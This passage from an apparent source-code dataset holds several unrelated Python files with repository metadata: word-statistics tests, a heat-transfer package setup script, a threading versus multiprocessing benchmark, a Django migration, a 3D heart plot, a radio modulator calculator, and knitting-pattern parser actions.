(1999, 20, '', 0),
])
def test_add_new_document(doc_year, doc_score, doc_text, expected_total_score):
statistic = WordStatistic()
statistic.add_new_document_to_statistic(doc_year, doc_score, doc_text)
total_score = sum(statistic.words_statistic[doc_year].values())
assert expected_total_score == total_score
@pytest.mark.parametrize('doc_info, stop_words, expected_words_len', [
([(1999, -2, 'word $word are'),
(1999, -2, 'another word,word')], [], 3),
([(1999, -2, 'word $word are'),
(2000, -2, 'another word,word')], ['word', 'another'], 1),
([(1999, -2, 'word wOrd woRd'),
(2000, -2, 'Word word $word')], ['word'], 0),
])
def test_add_new_document_with_stop_words(doc_info, stop_words, expected_words_len):
statistic = WordStatistic()
statistic.load_stop_words(stop_words)
for doc_year, doc_score, doc_text in doc_info:
statistic.add_new_document_to_statistic(doc_year, doc_score, doc_text)
words_count = total_size_of_dict_of_dict(statistic.words_statistic)
assert expected_words_len == words_count
@pytest.mark.parametrize('queries, expected_queries_len', [
(['1999,2000,3', '1999,2000,3', '1999,2000,3'], 3),
(['1999,2000,text', '2000,3', '1999,,3'], 0),
(['1999,2000,3', '1999,text,3', '1999,2000,3'], 2),
])
def test_add_new_document_with_stop_words(queries, expected_queries_len):
statistic = WordStatistic()
valid_queries = statistic.parse_queries(queries)
assert expected_queries_len == len(valid_queries)
@pytest.mark.parametrize('start_year, end_year, top_n, expected_answer', [
(2000, 2000, 2, '{"start": 2000, "end": 2000, "top": []}'),
(2019, 2019, 2, '{"start": 2019, "end": 2019, "top": [["seo", 15], ["better", 10]]}'),
(2019, 2020, 4,
'{"start": 2019, "end": 2020, "top": [["better", 30], ["javascript", 20], ["python", 20], ["seo", 15]]}')
])
def test_calculate_statistic(start_year, end_year, top_n, expected_answer):
doc_info = [(2019, 10, 'Is SEO better better better done with repetition?'),
(2019, 5, 'What is SEO?'),
(2020, 20, 'Is Python better than Javascript?')
]
stop_words = ['is', 'than']
statistic = WordStatistic()
statistic.load_stop_words(stop_words)
for doc_year, doc_score, doc_text in doc_info:
statistic.add_new_document_to_statistic(doc_year, doc_score, doc_text)
answer = statistic.calculate_statistic(start_year, end_year, top_n)
assert expected_answer == answer
| [
"mix2ra93@mail.ru"
] | mix2ra93@mail.ru |
9853adc4987d40133d9350088b70b19b22b4c19d | 24d4afbf1f6316b3a607308349fd887c13ffe9ee | /Scripts/HT_scripts/ht/setup.py | a8e5ed3d27e2c0e037ea37f695abbc5c93997797 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | mylenre/Data_phD | 65d97adaf39fcd79d8228679ada6602e86af6995 | ee5122fe405fd00b99b53e248299a18199bfa35a | refs/heads/master | 2023-05-07T20:04:56.183354 | 2021-05-28T15:42:55 | 2021-05-28T15:42:55 | 210,873,457 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,489 | py | # -*- coding: utf-8 -*-
'''Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2016, Caleb Bell <Caleb.Andrew.Bell@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.'''
from setuptools import setup
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Manufacturing',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: MacOS',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Operating System :: POSIX :: BSD',
'Operating System :: POSIX :: Linux',
'Operating System :: Unix',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Education',
'Topic :: Scientific/Engineering :: Atmospheric Science',
'Topic :: Scientific/Engineering :: Chemistry',
'Topic :: Scientific/Engineering :: Physics',
]
description = 'Heat transfer component of Chemical Engineering Design Library (ChEDL)'
keywords = ('heat-transfer heat-exchanger air-cooler tube-bank condensation '
'boiling chemical-engineering mechanical-engineering pressure-drop '
'radiation process-simulation engineering insulation flow-boiling '
'nucleate-boiling reboiler cross-flow')
setup(
name = 'ht',
packages = ['ht'],
license='MIT',
version = '0.1.54',
description = description,
author = 'Caleb Bell',
long_description = open('README.rst').read(),
platforms=["Windows", "Linux", "Mac OS", "Unix"],
author_email = 'Caleb.Andrew.Bell@gmail.com',
url = 'https://github.com/CalebBell/ht',
download_url = 'https://github.com/CalebBell/ht/tarball/0.1.54',
keywords = keywords,
classifiers = classifiers,
install_requires=['fluids>=0.1.77', 'numpy>=1.5.0', 'scipy>=0.9.0'],
package_data={'ht': ['data/*']},
extras_require = {
'Coverage documentation': ['wsgiref>=0.1.2', 'coverage>=4.0.3', 'pint']
},
)
| [
"55740158+mylenre@users.noreply.github.com"
] | 55740158+mylenre@users.noreply.github.com |
67d85dfc6f8f78470a4739d54c6e04b4e9b08ee9 | ab8e63babb6b412222aa5a7806728a171a5535d9 | /prat4/ex1_a.py | a8a337bebdc33f72c634137b6ddaa3f31db82065 | [] | no_license | tomasfj/programacao-distribuida | 90237839593982860ed6faaed816a423dfa52172 | b0c717cb0be7c13d8ef9e34c9cf963e1d46e1237 | refs/heads/master | 2021-05-17T05:27:21.175762 | 2020-04-26T15:34:20 | 2020-04-26T15:34:20 | 250,649,160 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,162 | py | '''
Estudar os tempos de execução:
. sequencial
. multithread
. multiprocessos
para cada uma das funções:
. fibonacci
. url
. readFile
Analisar resultados.
'''
from threading import Thread
import urllib.request
import time
from multiprocessing import Process
# Execução Sequencial
class nothreads_object(object):
def run(self):
#function_to_run_fibbo()
function_to_run_url()
#function_to_run_file()
def non_threaded(num_iter):
funcs = []
for i in range( int(num_iter) ):
funcs.append(nothreads_object())
for i in funcs:
i.run()
# Execução multithreaded
class threads_object(Thread):
def run(self):
#function_to_run_fibbo()
function_to_run_url()
#function_to_run_file()
def threaded(num_threads):
funcs = []
for i in range( int(num_threads) ):
funcs.append( threads_object() )
for i in funcs:
i.start()
for i in funcs:
i.join()
def show_results(func_name, results):
print("%-23s %4.6f seconds" %(func_name, results))
# Execução multiprocessing
class process_object(Process):
def run(self):
#function_to_run_fibbo()
function_to_run_url()
#function_to_run_file()
def processed(num_processes):
funcs = []
for i in range(int(num_processes)):
funcs.append(process_object())
for i in funcs:
i.start()
for i in funcs:
i.join()
# functions to run
def function_to_run_fibbo():
#Fibonacci
a = 0
b = 1
for i in range(100000):
a = b
b = a+b
def function_to_run_url():
for i in range(10):
with urllib.request.urlopen("https://google.com") as f:
f.read(1024)
def function_to_run_file():
file = open("test.dat", "rb")
size = 1024
for i in range(1000):
file.read(size)
# main
if __name__ == "__main__":
num_threads = [1,2,4,8]
print("Starting tests")
for i in num_threads:
# sequencial
start = time.time()
non_threaded(i)
executionTime = time.time() - start
show_results("non_threaded (%s iters)" %i, executionTime)
# threaded
start = time.time()
threaded(i)
executionTime = time.time() - start
show_results("threaded (%s threads)" % i, executionTime)
# processed
start = time.time()
processed(i)
executionTime = time.time() - start
show_results("processed (%s processes)" %i, executionTime)
print("Iterations complete")
'''
Apresentação de resultados:
Fibonacci (F1)
Threads | Sequencial | Threaded | Processed
1 | 0.140220 s | 0.142309 s | 0.171712 s
2 | 0.278199 s | 0.276906 s | 0.162182 s
4 | 0.592690 s | 0.568686 s | 0.209662 s
8 | 1.138981 s | 1.127482 s | 0.313482 s
Análise: Durante todo o processo a execução Sequencial e Threaded obtiveram
resultados semelhantes enquanto que a execução por Processos obteve sempre
melhores resultados, excepto na primeira execução (1 thread).
À medida que o número de threads aumentou a execução por Processos
destacou-se em relação às outras (no que toca ao tempo de execução).
URL (F2)
Threads | Sequencial | Threaded | Processed
1 | 4.237558 s | 4.487031 s | 4.510582 s
2 | 8.526937 s | 5.060087 s | 4.090834 s
4 | 17.99895 s | 5.126970 s | 4.814211 s
8 | 33.76315 s | 5.157609 s | 5.259390 s
Análise: À medida que o número de threads/processos aumentou a solução
sequencial verificou um aumento no tempo de execução enquanto que as outras
duas soluções se mantiveram relativamente constantes.
ReadFile (F3)
Threads | Sequencial | Threaded | Processed
1 | 0.005640 s | 0.005557 s | 0.014764 s
2 | 0.010888 s | 0.009978 s | 0.019795 s
4 | 0.021694 s | 0.054544 s | 0.026143 s
8 | 0.043437 s | 0.111490 s | 0.044909 s
Análise: Neste caso a solução sequencial foi a apresentou melhores
resultados e a solução threaded acabou por ser a mais demorada.
''' | [
"noreply@github.com"
] | noreply@github.com |
29084ab0b03701b8d5c0589acbfcf5b0b0c42b01 | 3a009df40f634d41f4de9ece3c58703cebdc321f | /atm_analytics/analytics/migrations/0018_remove_atmcase_xfs_format.py | 7a0bce8f08a07148b9f16816b8115f51317d65b5 | [
"MIT"
] | permissive | ifreddyrondon/atm-analytics | 3dcdb7fc184fced13f8118fd1486a64b69c1ce3c | 654ba8993b05848cfb4a18ff2f6e4ee44ba7c246 | refs/heads/master | 2022-11-28T16:44:59.388168 | 2020-02-01T21:29:20 | 2020-02-01T21:29:20 | 63,739,156 | 0 | 1 | MIT | 2022-11-22T01:01:27 | 2016-07-20T01:15:12 | HTML | UTF-8 | Python | false | false | 359 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('analytics', '0017_atmcase_xfs_format'),
]
operations = [
migrations.RemoveField(
model_name='atmcase',
name='xfs_format',
),
]
| [
"spantons@gmail.com"
] | spantons@gmail.com |
8ce29595818ea2d4b7f8186cbb954cbdb7739d39 | a3ff13ecac60f891a3ebdcb4c72bf6a4b581a2d8 | /YCD/10.16公开课红心代码heart_3d.py | 307b46ff179ed773578ac66438fc7032e575e55a | [] | no_license | kekirk/pycode | 75533afc3018cba30d0abd3c29ab1c945b85504b | 06dab1a61d7b445cc19b41e4d281f62251e2583b | refs/heads/master | 2020-04-01T17:13:53.828118 | 2019-01-04T09:02:00 | 2019-01-04T09:02:00 | 153,419,332 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 707 | py | #!/usr/bin/env python
# coding: utf-8
# In[3]:
from pyecharts import Scatter3D
import numpy as np
# # 心形解析式
# # (x^2+9/4*y^2+z^2-1)^3-x^2*z^3-9/80*y^2*z^3=0
# In[5]:
scatter3D = Scatter3D("I Love You", width=1700, height=1000)
data = list()
x = list(np.linspace(-1.5, 1.5,150))
y = list(np.linspace(-1,1,100))
z = list(np.linspace(-1.5,1.5,100))
for a in x:
for b in y:
for c in z:
if -0.05<=(a**2+9.0/4.0*b**2+c**2-1)**3-a**2*c**3-9.0/80.0*b**2*c**3 <=0:
data.append([a,b,c])
scatter3D.add("", data, is_visualmap=True, visual_range_color="red")
scatter3D.render()
scatter3D
# In[20]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
| [
"kekirk@163.com"
] | kekirk@163.com |
020f91f4d1a8a9caa5c59fe28145b52c554f09ff | bf4178e73f0f83781be6784d7587cb34a38d6edd | /platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/common/calculators/calc_modulator.py | d1572f6a1abc18443087ee2ab822b05f0a10716a | [] | no_license | kolbertv/ZigbeeSiliconV3 | 80d70515e93be1413c24cdcb3485f50c65a1564b | ab0bd8d4bb6c1048adef81d0e66d96006c2fabd9 | refs/heads/master | 2023-01-02T07:18:01.393003 | 2020-10-25T15:33:08 | 2020-10-25T15:33:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,642 | py | """Core CALC_Modulator Calculator Package
Calculator functions are pulled by using their names.
Calculator functions must start with "calc_", if they are to be consumed by the framework.
Or they should be returned by overriding the function:
def getCalculationList(self):
"""
#import math
from pyradioconfig.calculator_model_framework.Utils.CustomExceptions import CalculationException
from pyradioconfig.calculator_model_framework.interfaces.icalculator import ICalculator
from pyradioconfig.parts.common.calculators.calc_utilities import CALC_Utilities
from enum import Enum
from pycalcmodel.core.variable import ModelVariableFormat, CreateModelVariableEnum
from py_2_and_3_compatibility import *
class CALC_Modulator(ICalculator):
"""
Init internal variables
"""
def __init__(self):
self._major = 1
self._minor = 0
self._patch = 0
def buildVariables(self, model):
"""Populates a list of needed variables for this calculator
Args:
model (ModelRoot) : Builds the variables specific to this calculator
"""
# symbol_encoding
var = self._addModelVariable(model, 'symbol_encoding', Enum, ModelVariableFormat.DECIMAL, 'Symbol Encoding Options')
member_data = [
['NRZ', 0, 'Non Return Zero Coding'],
['Manchester', 1, 'Manchester Coding'],
['DSSS', 2, 'Direct Sequence Spread Spectrum Coding'],
]
# Only Nerio (and Panther) support LINECODE Encoding, used for BLE Long Range
if model.part_family.lower() not in ["dumbo","jumbo","nixi"]:
member_data.append(['LINECODE', 3, 'Maps 0 to 0011 symbol and 1 to 1100 symbol'])
var.var_enum = CreateModelVariableEnum(
'SymbolEncodingEnum',
'List of supported symbol encoding options',
member_data)
# symbol_encoding
var = self._addModelVariable(model, 'manchester_mapping', Enum, ModelVariableFormat.DECIMAL, 'Manchester Code Mapping Options for packet payload')
member_data = [
['Default', 0, '0-bit corresponds to a 0 to 1 transition and 1-bit corresponds to 1 to 0 transition'],
['Inverted', 1, '0-bit corresponds to a 1 to 0 transition and 1-bit corresponds to 0 to 1 transition'],
]
var.var_enum = CreateModelVariableEnum(
'ManchesterMappingEnum',
'List of supported Manchester Code options',
member_data)
def calc_tx_baud_rate_actual(self, model):
"""
calculate actual TX baud rate from register settings
Args:
model (ModelRoot) : Data model to read and write variables from
"""
fxo = model.vars.xtal_frequency.value
txbr_ratio = model.vars.txbr_ratio_actual.value
tx_baud_rate = fxo / (8.0 * txbr_ratio)
model.vars.tx_baud_rate_actual.value = tx_baud_rate
def calc_symbol_rates_actual(self, model):
encoding = model.vars.symbol_encoding.value
encodingEnum = model.vars.symbol_encoding.var_enum
baud_per_symbol = 1
if model.part_family.lower() in ["nerio", "panther", "lynx", "ocelot"]:
if model.vars.MODEM_LONGRANGE_LRBLE.value == 1:
# In case of BLE LR 125 kps, baud_per_symbol is 8
if model.vars.FRC_CTRL_RATESELECT.value == 0:
baud_per_symbol = 8
# In case of BLE LR 500 kps, baud_per_symbol is 2
elif model.vars.FRC_CTRL_RATESELECT.value == 2:
baud_per_symbol = 2
else:
raise ValueError("Invalid FRC_CTRL_RATESELECT value used in LONGRANGE configuration")
if model.vars.FRC_CTRL_RATESELECT.value == 1:
encoding = model.vars.MODEM_CTRL6_CODINGB
if encoding == encodingEnum.LINECODE:
baud_per_symbol *= 4
if encoding == encodingEnum.DSSS:
baud_per_symbol *= model.vars.dsss_len.value
elif encoding == encodingEnum.Manchester:
baud_per_symbol *= 2
model.vars.baud_per_symbol_actual.value = baud_per_symbol
if encoding == encodingEnum.DSSS:
bits_per_symbol = model.vars.dsss_bits_per_symbol.value
else:
modFormat = model.vars.modulation_type.value
modFormatEnum = model.vars.modulation_type.var_enum
if modFormat in [modFormatEnum.FSK4, modFormatEnum.OQPSK]:
bits_per_symbol = 2
else:
bits_per_symbol = 1
model.vars.bits_per_symbol_actual.value = bits_per_symbol
#TODO: add support for ASK modulation
def calc_modindex_value(self, model):
"""
calculate MODINDEX value
Equations from Table 5.25 in EFR32 Reference Manual (internal.pdf)
Args:
model (ModelRoot) : Data model to read and write variables from
"""
fxo = model.vars.xtal_frequency.value * 1.0
modformat = model.vars.modulation_type.value
freq_dev_hz = model.vars.deviation.value * 1.0
synth_res = model.vars.synth_res_actual.value
shaping_filter_gain = model.vars.shaping_filter_gain_actual.value
interpolation_gain = model.vars.interpolation_gain_actual.value
if modformat == model.vars.modulation_type.var_enum.FSK2 or \
modformat == model.vars.modulation_type.var_enum.FSK4:
modindex = freq_dev_hz * 16.0 / (synth_res * shaping_filter_gain * interpolation_gain)
elif modformat == model.vars.modulation_type.var_enum.OQPSK or \
modformat == model.vars.modulation_type.var_enum.MSK:
modindex = fxo / (synth_res * 2 * shaping_filter_gain * interpolation_gain)
elif modformat == model.vars.modulation_type.var_enum.BPSK or \
modformat == model.vars.modulation_type.var_enum.OOK or \
modformat == model.vars.modulation_type.var_enum.DBPSK:
modindex = 150.0 * 16 / (shaping_filter_gain * interpolation_gain)
else:
raise CalculationException("ERROR: %s modulation not yet supported!" % modformat)
return
model.vars.modindex.value = modindex
def calc_modindex_field(self, model):
"""
convert desired modindex fractional value to MODINDEXM * 2^MODINDEXE
Equations (5.13) of EFR32 Reference Manual (internal.pdf)
Args:
model (ModelRoot) : Data model to read and write variables from
"""
modindex = model.vars.modindex.value
# convert fractional modindex into m * 2^e format
m, e = CALC_Utilities().frac2exp(31, modindex)
# MODEINDEXE is a signed value
if e < 0:
e += 32
# verify number fits into register
if m > 31:
m = 31
if e > 31:
e = 31
if m < 0:
m = 0
self._reg_write(model.vars.MODEM_MODINDEX_MODINDEXM, int(m))
self._reg_write(model.vars.MODEM_MODINDEX_MODINDEXE, int(e))
def calc_modindex_actual(self, model):
"""
given register settings return actual MODINDEX as fraction
Equations (5.13) of EFR32 Reference Manual (internal.pdf)
Args:
model (ModelRoot) : Data model to read and write variables from
"""
m = model.vars.MODEM_MODINDEX_MODINDEXM.value
e = model.vars.MODEM_MODINDEX_MODINDEXE.value
# MODEINDEXE is a signed value
if e > 15:
e -= 32
model.vars.modindex_actual.value = 1.0 * m * 2**e
def calc_modulation_index_actual(self, model):
"""
calculate the actual modulation index for given PHY
This is the traditional modulation index as 2 * deviation / baudrate
the one above we call modindex and is specific value used by EFR32
Args:
model (ModelRoot) : Data model to read and write variables from
"""
baudrate_hz = model.vars.tx_baud_rate_actual.value
tx_deviation = model.vars.tx_deviation_actual.value
model.vars.modulation_index_actual.value = tx_deviation * 2.0 / baudrate_hz
def calc_tx_freq_dev_actual(self, model):
"""
given register setting return actual frequency deviation used in the modulator
Using Equations in Table 5.25 of EFR32 Reference Manual (internal.pdf)
Args:
model (ModelRoot) : Data model to read and write variables from
"""
modformat = model.vars.modulation_type.value
modindex = model.vars.modindex_actual.value
synth_res = model.vars.synth_res_actual.value
shaping_filter_gain = model.vars.shaping_filter_gain_actual.value
interpolation_gain = model.vars.interpolation_gain_actual.value
if modformat == model.vars.modulation_type.var_enum.FSK2 or \
modformat == model.vars.modulation_type.var_enum.FSK4:
freq_dev_hz = modindex * (synth_res * shaping_filter_gain * interpolation_gain) / 16.0
else:
freq_dev_hz = 0.0
model.vars.tx_deviation_actual.value = freq_dev_hz
# calculate TX baudrate ratio
# Using Equation (5.7) of EFR32 Reference Manual (internal.pdf)
def calc_txbr_value(self, model):
"""
calculate TX baudrate ratio
Using Equation (5.7) of EFR32 Reference Manual (internal.pdf)
Args:
model (ModelRoot) : Data model to read and write variables from
"""
fxo = model.vars.xtal_frequency.value
baudrate = model.vars.baudrate.value
# calculate baudrate to fxo ratio
ratio = fxo / (baudrate * 8.0)
model.vars.txbr_ratio.value = ratio
def calc_txbr_reg(self, model):
"""
given desired TX baudrate ratio calculate TXBRNUM and TXBRDEN
that gets as close as possible to the ratio.
Note that we start from the highest possible value for TXBRDEN
and go down since having largest possible values in these register
to have better phase resolution in OQPSK and MSK (see end of section
5.6.5 in the manual)
Args:
model (ModelRoot) : Data model to read and write variables from
"""
ratio = model.vars.txbr_ratio.value
# find best integer ratio to match desired ratio
for den in xrange(255, 0, -1):
num = ratio * den
if abs(round(num) - num) < 0.003 and num < 32768:
break
self._reg_write(model.vars.MODEM_TXBR_TXBRNUM, int(round(num)))
self._reg_write(model.vars.MODEM_TXBR_TXBRDEN, int(den))
def calc_txbr_actual(self, model):
"""
given register values calculate actual TXBR ratio implemented
Args:
model (ModelRoot) : Data model to read and write variables from
"""
num = model.vars.MODEM_TXBR_TXBRNUM.value * 1.0
den = model.vars.MODEM_TXBR_TXBRDEN.value
ratio = num / den
model.vars.txbr_ratio_actual.value = ratio
def calc_txbases_reg(self, model):
"""
set TXBASES based on preamble length and base bits value
Args:
model (ModelRoot) : Data model to read and write variables from
"""
txbases = model.vars.preamble_length.value / model.vars.preamble_pattern_len_actual.value
# Some input combinations can produce values out of range for the register fields,
# such as applying ludicrously long preamble lengths.
# MCUW_RADIO_CFG-793
# TODO: is would be best to query the register model to determine these two fields are 7 bits wide
if (txbases) > 0xffff:
raise CalculationException("Calculated TX preamble sequences (TXBASE) value of %s exceeds limit of 65535! Adjust preamble inputs." % txbases )
self._reg_write(model.vars.MODEM_PRE_TXBASES, int(txbases))
def calc_symbol_encoding(self, model):
"""
set CODING register
Args:
model (ModelRoot) : Data model to read and write variables from
"""
encoding = model.vars.symbol_encoding.value
if encoding == model.vars.symbol_encoding.var_enum.DSSS:
coding = 2
elif encoding == model.vars.symbol_encoding.var_enum.Manchester:
coding = 1
else:
coding = 0
self._reg_write(model.vars.MODEM_CTRL0_CODING, coding)
def calc_mapfsk_reg(self, model):
"""
program MAPFSK register based on input
Args:
model (ModelRoot) : Data model to read and write variables from
"""
mod_format = model.vars.modulation_type.value
manchester_map = model.vars.manchester_mapping.value
fsk_map = model.vars.fsk_symbol_map.value
encoding = model.vars.symbol_encoding.value
FSKMAP_LOOKUP = {
model.vars.fsk_symbol_map.var_enum.MAP0.value: 0,
model.vars.fsk_symbol_map.var_enum.MAP1.value: 1,
model.vars.fsk_symbol_map.var_enum.MAP2.value: 2,
model.vars.fsk_symbol_map.var_enum.MAP3.value: 3,
model.vars.fsk_symbol_map.var_enum.MAP4.value: 4,
model.vars.fsk_symbol_map.var_enum.MAP5.value: 5,
model.vars.fsk_symbol_map.var_enum.MAP6.value: 6,
model.vars.fsk_symbol_map.var_enum.MAP7.value: 7,
}
mapfsk = FSKMAP_LOOKUP[fsk_map.value]
if mod_format != model.vars.modulation_type.var_enum.FSK4:
# if we're using Manchester encoding (or any FSK modulation actually),
# then only MAP0 and MAP1 are valid
if mapfsk > 1:
raise CalculationException("Invalid fsk symbol map value for modulation type selected.")
if encoding == model.vars.symbol_encoding.var_enum.Manchester:
# if we're using Manchester encoding,
# then only MAP0 and MAP1 are valid
if mapfsk > 1:
raise CalculationException("Invalid fsk_symbol_map value for Manchester encoding")
# if we're using inverted Manchester encoding, then flip the polarity of the fsk
# map. This flips the polarity of the entire transmission, including the preamble
# and syncword. We don't want the preamble and syncword flipped, so we'll invert those
# registers elsewhere
if manchester_map != model.vars.manchester_mapping.var_enum.Default:
mapfsk ^= 1
self._reg_write(model.vars.MODEM_CTRL0_MAPFSK, mapfsk)
| [
"1048267279@qq.com"
] | 1048267279@qq.com |
eabcf21c690f19f586bbd3c12d8f48ca73b8efff | 1ba18a08d38c693cc20d0f773a6f3a9e23c9560a | /knitspeak_compiler/knitspeak_interpreter/knitspeak_actions.py | fbfe0822362a700cdecd4c3174bb70a1ff2ae88e | [] | no_license | mhofmann-uw/599-Knitting-Assignments | 9d77b8911b187e1e51c80a217fb85c18a17ce5f1 | 136cde8d63152155c634f3b0680b53c1fd56775a | refs/heads/main | 2023-08-24T18:07:38.909553 | 2021-11-09T19:56:29 | 2021-11-09T19:56:29 | 409,295,658 | 0 | 8 | null | null | null | null | UTF-8 | Python | false | false | 12,241 | py | """actions are called by parglare while parsing a file to reduce the abstract syntax tree as it is processed"""
from typing import Dict, List, Tuple, Union
from knitspeak_compiler.knitspeak_interpreter.closures import Operation_Closure, Num_Closure, Num_Variable_Closure, Num_Assignment_Closure, Iterator_Closure, Current_Row_Closure
from parglare import get_collector
from parglare.parser import Context
from knitspeak_compiler.knitspeak_interpreter.cable_definitions import Cable_Definition
from knitspeak_compiler.knitspeak_interpreter.stitch_definitions import Stitch_Definition
# some boiler plate parglare code
action = get_collector()
@action
def course_ids(context, nodes) -> List[Union[int, Num_Closure, Iterator_Closure]]:
"""
The action to simplify data in a courseIdDefinition
:param context: the context to gather symbol table data
:param nodes: the nodes of the parsed content should be of length 2
:return: a list of course_id integers
"""
row_node = 1
course_range = nodes[0]
if len(nodes) == 3:
row_node = 2
if "rs" == nodes[1]:
course_range = [1]
else:
course_range = [2]
context.parser.symbolTable[f"all_{nodes[1]}"] = course_range
assert "ow" in nodes[row_node], "Currently this parser only accepts rows (not rounds)"
return course_range
@action
def course_statement(_, nodes) -> Dict[str, list]:
"""
The action that simplifies courseStatements
:param _: unused context provided by parglare
:param nodes: the nodes of the parsed content
expected nodes:
node[0] is boolean to determine if the row should be reversed operations
node[1] the course ids
node[2] the stitch operations
:return: A dictionary with two keys: "courseIds" to the list of course_ids (ints)
and "stitch-operations" keyed to the list of stitch operation tuples with repeat data
"""
if nodes[0] is not None:
newStitchDefs = _flipStitchList(nodes[2])
return {"courseIds": nodes[1], "stitch-operations": newStitchDefs}
return {"courseIds": nodes[1], "stitch-operations": nodes[2]}
def _flipStitchList(operation_tuple_list: List[tuple]) -> list:
"""
flips the operations in the list as if they were worked from the opposite side (knits vs purls)
:param operation_tuple_list: the list of operations that need to be flipped
:return: the flipped operation in the original order
"""
newStitchDefs = []
for operation in operation_tuple_list:
stDef = operation[0]
if type(stDef) is list:
newStitchDefs.append((_flipStitchList(stDef), operation[1]))
else:
stDef = stDef.copy_and_flip()
newStitchDefs.append((stDef, operation[1]))
return newStitchDefs
@action
def side(_, nodes: str) -> str:
"""
:param _: the unused context provided by action
:param nodes: should be one node with the side information
:return: will return "rs" or "ws"
"""
sideToLower = nodes
if sideToLower[0:1] == "(":
sideToLower = sideToLower[1:]
if sideToLower[-1:] == ")":
sideToLower = sideToLower[:-1]
return sideToLower.lower()
@action
def course_id_list(_, nodes: list) -> List[Union[int, Num_Closure, Iterator_Closure]]:
"""
course_id_list: course_id_list commaAnd course_id | course_id;
:param _: context data ignored but passed by parglare
:param nodes: the node data passed by the parser
:return: a list of course_identifiers processed from the course_id_list
"""
if len(nodes) == 1:
if type(nodes[0]) is int or isinstance(nodes[0], Num_Closure) or isinstance(nodes[0], Iterator_Closure):
course_identifiers = [nodes[0]]
else: # nodes is a course_identifiers list already
course_identifiers = nodes[0]
else:
course_identifiers = nodes[0]
course_identifiers.append(nodes[2])
topList = []
for cId in course_identifiers:
if type(cId) is int or isinstance(cId, Num_Closure) or isinstance(cId, Iterator_Closure):
topList.append(cId)
else: # cID is course_identifiers list
for subId in cId:
topList.append(subId)
course_identifiers = topList
courseSet = set()
unique_c_ids = []
for cId in course_identifiers:
if isinstance(nodes[0], Num_Closure) or isinstance(nodes[0], Iterator_Closure):
unique_c_ids.append(cId)
elif cId not in courseSet:
unique_c_ids.append(cId)
courseSet.add(cId)
return unique_c_ids
@action
def stitch_statement_List(_, nodes) -> List[tuple]:
"""
:param _: parglare context provided but not needed
:param nodes: the nodes passed by parglare
:return: processes a list of stitch statements into the needed tuples
"""
if len(nodes) == 1:
if type(nodes[0]) is list:
return nodes[0]
else:
return [nodes[0]]
else:
stitchList = nodes[0]
if type(nodes[2]) is list:
stitchList.extend(nodes[2])
else:
stitchList.append(nodes[2])
topList = []
for stitch in stitchList:
if type(stitch) is list:
for subStitch in stitch:
topList.append(subStitch)
else:
topList.append(stitch)
return stitchList
@action
def repeated_Stitch(_, nodes: list) -> Tuple[Union[Stitch_Definition, Cable_Definition], Tuple[bool, int]]:
"""
:param _: context provided by parglare but not used
:param nodes:
node[0] the stitch operation to be repeated
node[1], if exists, the number of repeats. Defaults to 1
:return: returns the repeated stitch tuple. the operation followed by a tuple declaring the repeat structure
"""
if nodes[1] is None:
nodes[1] = 1
return nodes[0], (True, nodes[1])
@action
def repeated_stitch_group(_, nodes):
"""
:param _:
:param nodes:
:return:
"""
if nodes[1] is None:
nodes[1] = 1
return nodes[0], nodes[1]
# todo may be deprecated?
@action
def static_stitch_group(_, nodes) -> Tuple[List[tuple], Tuple[bool, int]]:
"""
:param _: the context passed by parglare but not used
:param nodes:nodes[1] the stitch statement list to be repeated, nodes[3] the repetition count
:return: a tuple of the list of stitch operations to be repeated
"""
if nodes[3] is None:
nodes[3] = 1
return nodes[1], (True, nodes[3])
@action
def conditional_stitch_group(_, nodes: list) -> Tuple[List[Tuple], Tuple[bool, int]]:
"""
:param _: the context passed by parglare but not used
:param nodes: nodes[1] the stitch statement list to be repeated, nodes[3] the repetition instructions
:return: the stitch statement list to be repeated and the repeat instruction in a tuple
"""
return nodes[1], nodes[3]
@action
def between_courses(context, nodes) -> Union[Iterator_Closure, List[int]]:
"""
process statement iterated courses to a list of course_ids
:param context: context passed by parglare, but not used
:param nodes: the nodes from the statement to process
:return: list of course ids
"""
start_num = nodes[2]
end_num = nodes[4]
include_ws = True
include_rs = True
side_exclusion = nodes[1]
if side_exclusion is not None:
if side_exclusion == "ws":
include_rs = False
elif side_exclusion == "rs":
include_ws = False
if isinstance(start_num, Num_Closure) or isinstance(end_num, Num_Closure):
